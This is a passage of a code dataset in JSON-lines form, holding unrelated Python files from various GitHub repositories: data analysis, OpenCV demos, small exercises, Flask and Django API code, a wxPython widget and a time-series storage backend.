filtered_sentence.append(w)\n # Create counter\n counts_no_urls = collections.Counter(filtered_sentence)\n\n print(counts_no_urls.most_common(15))\n\n clean_tweets_no_urls = pd.DataFrame(counts_no_urls.most_common(30),\n columns=['content', 'content_count'])\n\n print(clean_tweets_no_urls.head())\n monsendmany(clean_tweets_no_urls, \"Newyork_tophash\")\n # 5.md - plotting horizontal bar graph #\n\n fig, ax = plt.subplots(figsize=(8,8))\n # Plot horizontal bar graph\n clean_tweets_no_urls.sort_values(by='count').plot.barh(x='words',\n y='count',\n ax=ax,\n color=\"purple\")\n\n ax.set_title(\"Common Words Found in Tweets\")\n\n plt.show()\n\n\nmain()","repo_name":"TommyCChen/E6889-project","sub_path":"Final/Top trending.py","file_name":"Top trending.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"35307719383","text":"import cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\ndef back_project_demo(roi_img,raw_img): #直方图方向查找\n hsv = cv.cvtColor(roi_img, cv.COLOR_BGR2HSV)\n raw_hsv = cv.cvtColor(raw_img, cv.COLOR_BGR2HSV)\n roi_hist = cv.calcHist([hsv], [0, 1], None, [400, 400], [0, 180, 0, 256])\n cv.normalize(roi_hist,roi_hist,0,255,cv.NORM_MINMAX)\n dst = cv.calcBackProject([raw_hsv],[0,1],roi_hist,[0, 180, 0, 256],1)\n cv.imshow('backprojrct_demo',dst)\n\n\n# 直方图反向投影\ndef hist2d_demo(image):\n \"\"\"\n 2d直方图的制作:(x:s y:h)\n 1.转换到hsv色彩空间\n 2.cv.calHist统计直方图 p1:img必须方括号\n p2:用什么通道\n p3:遮罩\n p4:多少哥直方柱,或者理解为x轴或y轴坐标的尺度比例\n p5:ranges参数表示像素值的范围,通常[0,256]。\n 此外,假如channels为[0,1],ranges为[0,256,0,180],则代表0通道范围是0-256,1通道范围0-180。\n\n \"\"\"\n hsv = cv.cvtColor(image, cv.COLOR_BGR2HSV)\n hist = cv.calcHist([hsv], [0, 1], None, [180, 256], [0, 180, 0, 256])\n plt.imshow(hist,interpolation='nearest')\n #cv.imshow('hist2d_demo',hist)\n\n\nimg = cv.imread('./image/load_sunny.jpg', 1) # blue green red\nimg_roi = cv.imread('./image/load_sunny_roi.jpg', 1)\nback_project_demo(img_roi,img)\n# #plt.xlim([0, 256])\n#cv.imshow('img', img)\n#hist2d_demo(img)\n","repo_name":"xzltc/OpenCV_study","sub_path":"class_11.py","file_name":"class_11.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10678698087","text":"from Atmexception import depositeerror,withdrawerror,Insuffunderror\nbal=500.00\ndef deposite():\n damt=float(input(\"enter a deposite amount:\"))\n if(damt<=0):\n raise depositeerror\n else:\n global bal\n bal=bal+damt\n print(\"u r acount credited with inr:{}\",format(damt))\n print(\"now u r acount balance after deposite:{}\".format(bal))\ndef withdraw():\n global bal\n wamt = float(input(\"enter a deposite amount:\"))\n if (wamt <= 0):\n raise withdrawerror\n elif((wamt+500)>bal):\n raise Insuffunderror\n else:\n bal=bal-wamt\n print(\"u r acount debited with inr:{}\".format(wamt))\n print(\"now u r acount balance after debitated:{}\".format(bal))\ndef balenq():\n print(\"now u r acount balance eq:{}\".format(bal))\n\n","repo_name":"Shaikmominsaratajbegum/c-language","sub_path":"PycharmProjects/pythonProject2exceptions/ATMoperation.py","file_name":"ATMoperation.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"46227672088","text":"\"\"\"61070023 Ruleofthree\"\"\"\ndef main(num, bcost, bsize, bratio):\n \"\"\"This problem want to know, what is the best price with the biggest size\"\"\"\n for _ in range(num):\n cost = float(input())\n size = float(input())\n ratio = size/cost\n if ratio >= bratio:\n bratio = ratio\n bcost = cost\n bsize = size\n print(\"%.2f %.2f\" % (bcost, bsize))\n\nmain(int(input()), 0, 0, 0)\n","repo_name":"ZeroHX/PSIT2018","sub_path":"64.ruleofthree.py","file_name":"64.ruleofthree.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"12744214674","text":"import flask_restplus\n\nfrom producer.views import api_v1_bp as api_bp\napi = flask_restplus.Api(api_bp,\n title=\"消防API\",\n description=\"API\",\n contact=\"Tianjin Huitong Technology Co., Ltd\",\n contact_email=\"support@huitong-tech.com\",\n version=\"1.0\", )\nfrom .mqtt import api as mqtt_ns\napi.add_namespace(mqtt_ns,path='/mqtt')","repo_name":"tujiaan/PythonBase","sub_path":"producer/views/api_v1/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29773684689","text":"'''Напишите функцию modify_list(l), которая принимает на вход список целых чисел, \r\nудаляет из него все нечётные значения, а чётные нацело делит на два. Функция не должна\r\nничего возвращать, требуется только изменение переданного списка, например:'''\r\n\r\n\r\ndef modify_list(l):\r\n b=[]\r\n for i in l:\r\n b.append(i)\r\n l.clear()\r\n for i in range(len(b)):\r\n if b[i]%2==0:\r\n c=b[i]//2\r\n l.append(c)\r\n# Старый способ\r\n\r\n\r\n\r\ndef modify_list(l):\r\n x=0\r\n while x h:\n\t\t\theight = h_bmp\n\t\telse:\n\t\t\theight = h\n\t\treturn width, height, True\n\t\n\tdef DrawLabel(self, dc, width, height, dx=0, dy=0):\n\t\tbmp = self.bmpLabel\n\t\tif bmp is not None: # if the bitmap is used\n\t\t\tif self.bmpDisabled and not self.IsEnabled():\n\t\t\t\tbmp = self.bmpDisabled\n\t\t\tif self.bmpFocus and self.hasFocus:\n\t\t\t\tbmp = self.bmpFocus\n\t\t\tif self.bmpSelected and not self.up:\n\t\t\t\tbmp = self.bmpSelected\n\t\t\tbw, bh = bmp.GetWidth(), bmp.GetHeight()\n\t\t\tif not self.up:\n\t\t\t\tdx = dy = self.labelDelta\n\t\t\thasMask = bmp.GetMask() is not None\n\t\telse:\n\t\t\tbw = bh = 0 # no bitmap -> size is zero\n\t\t\thasMask = False\n\t\t\n\t\tdc.SetFont(self.GetFont())\n\t\tif self.IsEnabled():\n\t\t\tdc.SetTextForeground(self.GetForegroundColour())\n\t\telse:\n\t\t\tdc.SetTextForeground(wx.SystemSettings.GetColour(wx.SYS_COLOUR_GRAYTEXT))\n\t\t\n\t\tlabel = self.GetLabel()\n\t\ttw, th = dc.GetTextExtent(label) # size of text\n\t\tif not self.up:\n\t\t\tdx = dy = self.labelDelta\n\t\t\n\t\tpos_y = (width - bw - th) / 2 + dy # adjust for bitmap and text to centre\n\t\tif bmp is not None:\n\t\t\tdc.DrawBitmap(bmp, (width - bw) / 2 + dx, pos_y, hasMask) # draw bitmap if available\n\t\t\tpos_y = pos_y + 2 # extra spacing from bitmap\n\t\t\n\t\tdc.DrawText(label, (width - tw) / 2 + dx, pos_y + dy + bh) # draw the text\n\t\n\tdef OnGainFocus(self, event):\n\t\t\"\"\"\n\t\tHandles the ``wx.EVT_SET_FOCUS`` event for :class:`GenButton`.\n\n\t\t:param event: a :class:`wx.FocusEvent` event to be processed.\n\t\t\"\"\"\n\t\tself.SetWindowStyleFlag(wx.BORDER_DEFAULT)\n\t\tself.SetBezelWidth(1)\n\t\tself.SetUseFocusIndicator(True)\n\t\tGenBitmapButton.OnGainFocus(self, event)\n\t\n\tdef OnLoseFocus(self, event):\n\t\t\"\"\"\n\t\tHandles the ``wx.EVT_KILL_FOCUS`` event for :class:`GenButton`.\n\n\t\t:param event: a :class:`wx.FocusEvent` event to be processed.\n\t\t\"\"\"\n\t\tself.SetWindowStyleFlag(self.original_style)\n\t\tself.SetUseFocusIndicator(False)\n\t\tself.SetBezelWidth(0)\n\t\tGenBitmapButton.OnLoseFocus(self, event)\n\t\n\tdef DrawBezel(self, dc, x1, y1, x2, y2):\n\t\t# draw the upper left sides\n\t\tif self._mouse_over:\n\t\t\tdc.SetPen(wx.Pen(wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT), 2))\n\t\telse:\n\t\t\tdc.SetPen(wx.Pen(wx.SystemSettings.GetColour(wx.SYS_COLOUR_HIGHLIGHT), 1))\n\t\t\n\t\tfor i in range(self.bezelWidth):\n\t\t\n\t\t\tif self._mouse_over:\n\t\t\t\tdc.DrawRoundedRectangle(1, 1, self.GetSize().x - 3, self.GetSize().y - 3, 4)\n\t\t\telse:\n\t\t\t\tdc.DrawRoundedRectangle(0, 0, self.GetSize().x - 2, self.GetSize().y - 2, 5)\n","repo_name":"domdfcoding/GunShotMatch","sub_path":"GuiV2/GSMatch2_Core/custom_bitmap_button.py","file_name":"custom_bitmap_button.py","file_ext":"py","file_size_in_byte":4945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"41119015239","text":"import random\nfrom itertools import chain, combinations\nimport sys\n\n\ndef gen_prime(alphabet_size):\n primes = []\n count = 0\n for num in range(2, 100):\n if num > 1:\n for i in range(2, num):\n if (num % i) == 0:\n break\n else:\n primes.append(num)\n count += 1\n if count == alphabet_size:\n return list(primes)\n\n\ndef gen_power_set(primes):\n s = list(primes)\n multiply = []\n power_set = list(chain.from_iterable(combinations(s, r) for r in range(len(s) + 1)))\n for i in range(2 ** len(primes)):\n if len(power_set[i]) > 1:\n count = 1\n for j in range(len(power_set[i])):\n count *= power_set[i][j]\n multiply.append(count)\n return list(multiply)\n\n\ndef gen_solid_string(length, alphabet_size):\n text = []\n alphabet = gen_prime(alphabet_size)\n for i in range(length):\n text.append(alphabet[random.randint(0, alphabet_size - 1)])\n return text\n\n\ndef gen_indet_string(text, alphabet_size, num):\n alphabet = gen_prime(alphabet_size)\n indet_list = gen_power_set(alphabet)\n for i in range(0, num):\n pos = random.randint(0, len(text) - 1)\n if text[pos] in alphabet:\n text[pos] = indet_list[random.randint(0, len(indet_list) - 1)]\n else:\n pos = random.randint(0, len(text) - 1)\n text[pos] = indet_list[random.randint(0, len(indet_list) - 1)]\n return text\n\n\ndef gen_indet_pattern(text, alphabet_size, num):\n alphabet = gen_prime(alphabet_size)\n indet_list = gen_power_set(alphabet)\n #text[len(text) - 1] = indet_list[random.randint(0, len(indet_list) - 1)]\n for i in range(0, num):\n pos = random.randint(0, len(text) - 2)\n if text[pos] in alphabet:\n text[pos] = indet_list[random.randint(0, len(indet_list) - 1)]\n else:\n pos = random.randint(0, len(text) - 1)\n text[pos] = indet_list[random.randint(0, len(indet_list) - 1)]\n return text\n\n\ndef generate_text_pattern(\n text_length, text_indet_letters, pattern_length, pattern_indet_letters, alphabet\n):\n text = gen_solid_string(text_length, alphabet)\n text = gen_indet_string(text, alphabet, text_indet_letters)\n pattern = gen_solid_string(pattern_length, alphabet)\n pattern = gen_indet_pattern(pattern, alphabet, pattern_indet_letters)\n f = open(\n \"demofile_pattern\", \"w\"\n )\n for i in pattern:\n f.write(str(i) + \",\")\n f.close()\n\n f2 = open(\"demofile_text\", \"w\")\n for i in text:\n f2.write(str(i) + \",\")\n f2.close()\n\n\nargs = sys.argv[1:]\nif len(args) != 5:\n print(\"Usage: python3 script_name text_length k1 pattern_length k2 sigma\")\n sys.exit(1)\n\nval1 = int(args[0])\nval2 = int(args[1])\nval3 = int(args[2])\nval4 = int(args[3])\nval5 = int(args[4])\n\n\ngenerate_text_pattern(val1, val2, val3, val4, val5)\n","repo_name":"dehhganii/Practical_KMP_BM_Indet","sub_path":"create_strings.py","file_name":"create_strings.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"35791497057","text":"sal = float(input())\n\nif sal > 0 and sal <= 2000:\n print('Isento')\nelif sal > 2000 and sal <= 3000:\n sal_novo = ((sal-2000) * 8) / 100\n print('R$ {:.2f}'.format(sal_novo))\nelif sal <= 4500 and sal > 3000:\n sal_novo = (((sal - 3000) * 18) / 100) + (1000*0.08)\n print('R$ {:.2f}'.format(sal_novo))\nelse:\n sal_novo = (((sal - 4500) * 28) / 100) + (1000*0.08) + (1500 * 0.18)\n print('R$ {:.2f}'.format(sal_novo))\n\n#Imprima o texto \"R$\" seguido de um espaço e do valor total devido de Imposto de Renda, com duas casas após o ponto. Se o valor de entrada for menor ou igual a 2000, deverá ser impressa a mensagem \"Isento\".","repo_name":"renatoryu/BeecrowdPython","sub_path":"Pós_Aula_04/Bee_1051.py","file_name":"Bee_1051.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"38843261634","text":"from flask import Flask\n\nfrom .models import Admin\nfrom .routes import mainBP, actionBP\nfrom .extensions import db, csrf\nimport secrets\nfrom flask_login import LoginManager\nfrom werkzeug.security import generate_password_hash\n\n\ndef create_app():\n app = Flask(__name__, instance_relative_config=True, template_folder=\"ui/templates\", static_folder=\"ui/static\")\n app.config.from_object(\"config.Config\")\n\n login_manager = LoginManager()\n login_manager.init_app(app)\n login_manager.login_view = 'main.home'\n db.init_app(app)\n csrf.init_app(app)\n app.config[\"SESSION_SQLALCHEMY\"] = db\n app.config['SECRET_KEY'] = secrets.token_hex(16)\n\n app.register_blueprint(mainBP)\n app.register_blueprint(actionBP)\n\n with app.app_context():\n db.create_all()\n\n @login_manager.user_loader\n def load_user(user_id):\n return Admin.query.get(int(user_id))\n\n return app\n","repo_name":"FalconsForTheFuture/tasklist","sub_path":"tasklist/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"1625556976","text":"# -*- coding:utf-8; -*-\n\"\"\"\n解题思路:\n首先通过观察发现:不管最大矩形怎么画,它的高度肯定等于某个柱子的高度(不考虑有等高柱子)。这个结论可以用反证法证明。\n\n那么,问题就转变为,只要找到每个柱子作为高度时候的最大矩形,然后取其中最大值就对了,显然,这一层的时间复杂度是O(n)。\n\n那么,一个柱子作为高度的最大矩形具有什么特点呢?观察就可以得出:两侧的柱子都比他高!同样反证法可以证明:如果两侧柱子都比他矮,那么以它为高度画出的矩形与题意不合。\n\n那么,矩形面积=高度*宽度,高度已经确定(当前柱子的高度H)。宽度如何确定?继续观察,很明显,两侧的边界就是 *两侧出现的第一个低于H的柱子* 。这一步同样可以反证法。\n\n最终,这个问题就转化为,在数组a中,怎么找到第i位数字两侧小于a[i]的位置。典型的单调栈。\n\n\"\"\"\n\n\nclass Solution:\n def largestRectangleArea(self, heights):\n maxArea, stack = 0, []\n for i, v in enumerate(heights):\n while stack and heights[stack[-1]] > v: # 单调递增栈,计算栈顶元素的左右边界\n h = heights[stack.pop()] # 矩形高度\n l = stack[-1] if stack else -1 # 栈顶下面的元素是栈顶元素的左边界\n r = i # 当前入栈元素是栈顶元素的右边界\n area = h * (r - l - 1) # 计算面积\n maxArea = max(maxArea, area)\n\n stack.append(i)\n\n # 数组中剩余的元素是单调递增的,这些元素右侧都没与比他们矮的元素了\n r = len(heights)\n while stack:\n h = heights[stack.pop()]\n l = stack[-1] if stack else -1\n area = h * (r - l - 1)\n maxArea = max(maxArea, area)\n\n return maxArea\n\n\nif __name__ == \"__main__\":\n heights = [2, 1, 5, 6, 2, 3]\n s = Solution()\n print(s.largestRectangleArea(heights))\n","repo_name":"phenix3443/leetcode","sub_path":"84-largest-rectangle-in-histogram/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31324891864","text":"from Consistent_Root import *\n\nfrom decimal import Decimal, getcontext\ncount = 0\nindex = 0\nfor i in range(401):\n x = 1 - 2*(i % 2)\n for j in range(401):\n index += 1\n a, b = c_square_root(Decimal((i - 200)/100), Decimal(x*(j - 200)/100))\n if index > 17435 and index < 17431:\n count += 1\n print(f\"{a} {b} {Decimal((i - 200)/100)} {Decimal(x*(j - 200)/100)}\")\n elif count == 5:\n break\n\n # if i == 0 and j == 0:\n # lasst = a\n # else:\n # if abs(lasst - a) > .004:\n # print(f\"{i} {j}\")\n # lasst = a\n\n if count == 5:\n break","repo_name":"EloMalakhi/Polynomialic-formulas","sub_path":"Standardization_cSquareRoot.py","file_name":"Standardization_cSquareRoot.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"115762027","text":"import os\nimport struct\nfrom datetime import datetime, timedelta\nfrom decimal import Decimal\nfrom enum import Enum\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING, Any, Dict, Iterable, Optional, Tuple, Type\n\nimport pytz\nfrom pydantic import ConstrainedDecimal, ConstrainedStr\n\nfrom ..backend import Backend\nfrom .binary_struct import BinaryStruct\nfrom .timestream_file import TimeStreamFile\n\nif TYPE_CHECKING:\n from schema import TimeSeries\n\n\nFILESYSTEM_FILEPATH_FORMAT_DEFAULT = \"{table}/{dimensions}/{year}/{month:02d}/{day:02d}\"\n\n\nclass FileSystemBackend(Backend):\n root: Path\n endianess: str = \"<\"\n opened_files: Dict[str, \"TimeStreamFile\"]\n structs: Dict[Type[\"TimeSeries\"], \"BinaryStruct\"]\n\n def prepare_type(self, data_type: Type[\"TimeSeries\"]) -> None:\n if data_type not in self.structs:\n self.structs[data_type] = BinaryStruct(data_type, self.endianess)\n\n def __init__(self):\n root = os.environ.get(\"TIME_SERIES_FS_ROOT\", None)\n if root is None:\n raise ValueError(\"Please specify TIME_SERIES_FS_ROOT\")\n self.filepath_format = os.environ.get(\n \"TIME_SERIES_FS_FILEPATH_FORMAT\", FILESYSTEM_FILEPATH_FORMAT_DEFAULT\n )\n\n self.root = root\n if not os.path.exists(root):\n os.makedirs(root)\n\n self.opened_files = {}\n self.structs = {}\n\n def persist(self, point: \"TimeSeries\") -> None:\n print(f\"persisting {point.timestamp}\")\n\n binary_struct = self.structs[type(point)]\n filename = self.filename(point)\n\n timestream_file = self.timestream_file(filename, binary_struct.fmt)\n timestream_file.append(binary_struct.encode_point(point))\n\n def query(\n self,\n cls: Type[\"TimeSeries\"],\n dimensions: Dict[str, Any],\n start_time: datetime,\n end_time: Optional[datetime] = None,\n ) -> Iterable[\"TimeSeries\"]:\n lookup = TimeStreamFileLookup(cls, dimensions, start_time, end_time)\n\n binary_struct = self.structs[cls]\n files_queue = []\n\n for root, _, files in os.walk(self.root + \"/\" + cls.Meta.table):\n for file in files:\n filename = root + \"/\" + file\n if lookup.should_visit_file(filename):\n files_queue.append(filename)\n\n files_queue.sort()\n for filename in files_queue:\n print(\"traversing\", filename)\n timestream_file = TimeStreamFile(filename, binary_struct.fmt)\n for binary_entry in timestream_file.entries(end_time):\n yield binary_struct.decode_point(binary_entry)\n return []\n\n def filename(self, point: \"TimeSeries\") -> Path:\n dimensions = []\n if \"dimensions\" in self.filepath_format:\n for dimension_name in point.Meta.dimensions:\n dimensions.append(dimension_name)\n dimensions.append(str(point.data.dimensions[dimension_name]))\n\n file_dir = Path(\n self.filepath_format.format(\n table=point.Meta.table,\n year=point.timestamp.year,\n month=point.timestamp.month,\n day=point.timestamp.day,\n dimensions=\"/\".join(dimensions),\n )\n )\n return self.root / file_dir\n\n def timestream_file(self, path: str, struct_fmt: str) -> \"TimeStreamFile\":\n if path not in self.opened_files:\n self.opened_files[path] = TimeStreamFile(path, struct_fmt)\n\n return self.opened_files[path]\n\n def commit(self):\n for _, file_obj in self.opened_files.items():\n file_obj.commit()\n\n\nclass TimeStreamFileLookup:\n def __init__(\n self,\n cls: Type[\"TimeSeries\"],\n dimensions: Dict[str, Any],\n start_time: datetime,\n end_time: Optional[datetime] = None,\n ):\n dimensions_path = []\n for dimension_name in cls.Meta.dimensions:\n dimensions_path.append(dimension_name)\n 
dimensions_path.append(str(dimensions[dimension_name]))\n\n self.dimensions_path_str = \"/\".join(dimensions_path)\n self.start_time = start_time\n self.end_time = end_time\n\n def should_visit_file(self, filename: str) -> bool:\n filename_parts = filename.split(\"/\")\n date_parts = list(map(int, filename_parts[-3:]))\n # print(date_parts)\n file_date = datetime(*date_parts).replace(tzinfo=pytz.utc)\n should_visit = (\n self.dimensions_path_str in filename and file_date >= self.start_time\n )\n if self.end_time is not None:\n should_visit = should_visit and file_date < self.end_time + timedelta(\n days=1\n )\n\n return should_visit\n","repo_name":"toudi/pensieve","sub_path":"backends/filesystem/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"9577075763","text":"import time\nimport random\n\ndef fibonacci(n):\n if n <= 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fibonacci(n - 1) + fibonacci(n - 2)\n \nif __name__ == '__main__':\n n = random.randint(15, 35)\n start_time = time.time()\n result = fibonacci(n)\n end_time = time.time()\n print(f'The {n}th term in the fibonacci sequence is {result}')\n print(f'Time taken: {end_time - start_time:.6f} seconds')","repo_name":"JaylenConway/intermediate_exercises2","sub_path":"exercise_02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23516228121","text":"from django_filters.rest_framework import DjangoFilterBackend\nfrom rest_framework.filters import OrderingFilter, SearchFilter\nfrom v1.utility.models.utility_master import get_utility_by_id_string\nfrom v1.commonapp.views.custom_exception import CustomAPIException, InvalidAuthorizationException, InvalidTokenException\nfrom v1.commonapp.views.pagination import StandardResultsSetPagination\nfrom v1.consumer.models.consumer_service_contract_details import get_consumer_service_contract_detail_by_id_string\nfrom rest_framework import status, generics\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.response import Response\nfrom api.messages import *\nfrom master.models import get_user_by_id_string\nfrom v1.commonapp.common_functions import get_user_from_token, is_token_valid, is_authorized\nfrom v1.commonapp.views.logger import logger\nfrom v1.consumer.models.consumer_master import get_consumer_by_id_string\nfrom v1.consumer.serializers.consumer_offer_detail import ConsumerOfferDetailSerializer, \\\n ConsumerOfferDetailListSerializer\nfrom v1.userapp.decorators import is_token_validate, role_required\nfrom v1.consumer.models.consumer_offer_detail import ConsumerOfferDetail as ConsumerOfferModel\nfrom v1.commonapp.common_functions import is_authorized, is_token_valid, get_user_from_token, check_user\n\n# API Header\n# API end Point: api/v1/consumer/:id_string/offer-detail\n# API verb: POST\n# Package: Basic\n# Modules: S&M, Consumer Care, Consumer Ops\n# Sub Module: Consumer\n# Interaction: Add consumer offer detail\n# Usage: Add\n# Tables used: Consumer offer detail\n# Author: Rohan\n# Created on: 25/01/2021\n\n\nclass ConsumerOfferDetail(GenericAPIView):\n\n @is_token_validate\n # @role_required(CONSUMER_OPS, CONSUMER_OPS_CONSUMER, EDIT)\n def post(self, request, id_string):\n try:\n # user_id_string = get_user_from_token(request.headers['Authorization'])\n # user = get_user_by_id_string(user_id_string)\n user = check_user(request.headers['Authorization'])\n consumer = get_consumer_by_id_string(id_string)\n serializer = ConsumerOfferDetailSerializer(data=request.data)\n if serializer.is_valid(raise_exception=True):\n consumer_offer_detail = serializer.create(serializer.validated_data, consumer, user)\n if request.data['consumer_service_contract_id_string']:\n consumer_service_contract_detail_obj = get_consumer_service_contract_detail_by_id_string(request.data['consumer_service_contract_id_string'])\n consumer_offer_detail.consumer_service_contract_detail_id = consumer_service_contract_detail_obj.id\n consumer_offer_detail.save()\n\n view_serializer = ConsumerOfferDetailSerializer(instance=consumer_offer_detail, context={'request': request})\n return Response({\n STATE: SUCCESS,\n RESULT: view_serializer.data,\n }, status=status.HTTP_201_CREATED)\n else:\n return Response({\n STATE: ERROR,\n RESULT: list(serializer.errors.values())[0][0],\n }, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n logger().log(e, 'HIGH', module='Consumer Ops', sub_module='Consumer')\n res = self.handle_exception(e)\n return Response({\n STATE: EXCEPTION,\n RESULT: str(e),\n }, status=res.status_code)\n\n\nclass ConsumerOfferDetailList(generics.ListAPIView):\n try:\n serializer_class = ConsumerOfferDetailListSerializer\n pagination_class = StandardResultsSetPagination\n filter_backends = (DjangoFilterBackend, OrderingFilter, SearchFilter)\n filter_fields = ('tenant__id_string',)\n ordering_fields = ('tenant',)\n search_fields = 
('tenant__name',)\n\n        def get_queryset(self):\n            response, user_obj = is_token_valid(self.request.headers['Authorization'])\n            if response:\n                if is_authorized(1, 1, 1, user_obj):\n                    utility = get_utility_by_id_string(self.request.query_params['utility_id_string'])\n                    queryset = ConsumerOfferModel.objects.filter(utility=utility, is_active=True)\n                    if \"consumer_id\" in self.request.query_params:\n                        consumer = get_consumer_by_id_string(self.request.query_params['consumer_id'])\n                        queryset = queryset.filter(consumer_id=consumer.id)\n                    if queryset:\n                        return queryset\n                    else:\n                        raise CustomAPIException(\"Consumer offer details not found.\", status.HTTP_404_NOT_FOUND)\n                else:\n                    raise InvalidAuthorizationException\n            else:\n                raise InvalidTokenException\n    except Exception as e:\n        logger().log(e, 'MEDIUM', module='Consumer ops', sub_module='Consumer')","repo_name":"bynryTechnologies/Neovibe-API","sub_path":"api/v1/consumer/views/consumer_offer_detail.py","file_name":"consumer_offer_detail.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"36775340347","text":"import keyword\r\nfrom collections import OrderedDict\r\nimport os\r\nfrom pathlib import Path\r\nfrom typing import Dict, Sequence, Set\r\n\r\nfrom dmtgen.common.blueprint_attribute import BlueprintAttribute\r\nfrom dmtgen.common.package import Blueprint, Package\r\n\r\ntypes = {\"number\": \"float\", \"double\": \"float\", \"string\": \"str\", \"char\": \"str\",\r\n \"integer\": \"int\", \"short\": \"int\", \"boolean\": \"bool\"}\r\n\r\ndefault_values = {\"float\": 0.0, \"str\": None, \"int\": 0, \"bool\": False}\r\n\r\nsetters = {\"float\": \"float(value)\", \"str\": \"value\", \"int\": \"int(value)\", \"bool\": \"bool(value)\"}\r\n\r\ndef create_model(blueprint: Blueprint, package_name: str, package_path: str):\r\n model = {}\r\n name = blueprint.name\r\n imports = OrderedDict()\r\n cross_references = OrderedDict()\r\n model[\"name\"] = name\r\n super_classes = __find_super_classes(blueprint)\r\n model[\"super_classes\"] = __to__super_classes(super_classes)\r\n model[\"package\"] = package_name\r\n model[\"root_package\"] = package_name\r\n model[\"meta_package\"] = package_name + \".blueprints\" + package_path\r\n model[\"schema_package\"] = package_name + \".schema\" + package_path +\".schemas\"\r\n model[\"filename\"] = name.lower()\r\n model[\"version\"] = 1\r\n model[\"description\"] = blueprint.description\r\n type_name = __first_to_upper(name)\r\n model[\"type\"] = type_name\r\n model[\"blueprint_var_name\"] = name.lower()\r\n model[\"blueprint_type\"] = type_name + \"Blueprint\"\r\n model[\"schema_type\"] = type_name + \"Schema\"\r\n\r\n fields = []\r\n has_array = False\r\n needs_numpy = False\r\n\r\n\r\n for attribute in blueprint.all_attributes.values():\r\n field = __create_field(attribute,blueprint.parent,imports,cross_references)\r\n if field:\r\n fields.append(field)\r\n if field[\"is_array\"]:\r\n has_array = True\r\n needs_numpy |= not field[\"is_entity\"]\r\n\r\n model[\"has_self_reference\"] = __refers_to(blueprint, cross_references) or __refers_to(blueprint, imports)\r\n # We should also check that the imports does not point to this as a cross ref.\r\n #Remove any self reference from the imports or cross references\r\n\r\n imports = {name:bp_ref for name, bp_ref in imports.items() if bp_ref != blueprint}\r\n cross_references = {name:bp_ref for name, bp_ref in cross_references.items() if bp_ref != blueprint}\r\n\r\n import_types= set(imports.values())\r\n import_types = import_types.union(super_classes)\r\n\r\n pkg=blueprint.get_parent()\r\n for import_type in imports.values():\r\n if isinstance(import_type, Blueprint):\r\n for attribute in import_type.all_attributes.values():\r\n if not attribute.is_primitive and not attribute.is_enum:\r\n imp_bp = pkg.get_blueprint(attribute.type)\r\n if blueprint == imp_bp:\r\n cross_references[import_type.name] = import_type\r\n import_types.remove(import_type)\r\n\r\n model[\"imports\"] = __to__imports(pkg,import_types)\r\n model[\"has_cross_references\"] = len(cross_references) > 0\r\n model[\"cross_references\"] = __to__import_infos(pkg,cross_references.values())\r\n model[\"has_array\"] = has_array\r\n model[\"needs_numpy\"] = needs_numpy\r\n model[\"fields\"] = fields\r\n model[\"arguments\"]=__create_named_arguments(fields)\r\n return model\r\n\r\ndef __first_to_upper(string):\r\n # Make sure the first letter is uppercase\r\n return string[:1].upper() + string[1:]\r\n\r\ndef __create_field(attribute: BlueprintAttribute, package: Package,imports: OrderedDict,cross_references: 
OrderedDict):\r\n    field = {}\r\n    name = __rename_if_reserved(attribute.name)\r\n    field[\"name\"] = name\r\n    dimension = attribute.get(\"dimensions\",None)\r\n    field[\"description\"] = attribute.description\r\n    field[\"readonly\"] = False\r\n    is_array = dimension is not None\r\n\r\n    field[\"is_array\"] = is_array\r\n    a_type: str = attribute.get(\"attributeType\")\r\n    if a_type not in types:\r\n        blueprint = package.get_blueprint(a_type)\r\n        if attribute.contained:\r\n            imports[a_type]=blueprint\r\n        else:\r\n            cross_references[a_type]=blueprint\r\n        return __create_blueprint_field(field, blueprint, is_array)\r\n\r\n    enum_type = attribute.get(\"enumType\",None)\r\n    if enum_type:\r\n        return __create_enum_field(field,attribute,package,enum_type, imports)\r\n\r\n    ftype = __map_type(a_type)\r\n    field[\"is_entity\"] = False\r\n    field[\"type\"] = ftype\r\n    field[\"type_description\"] = 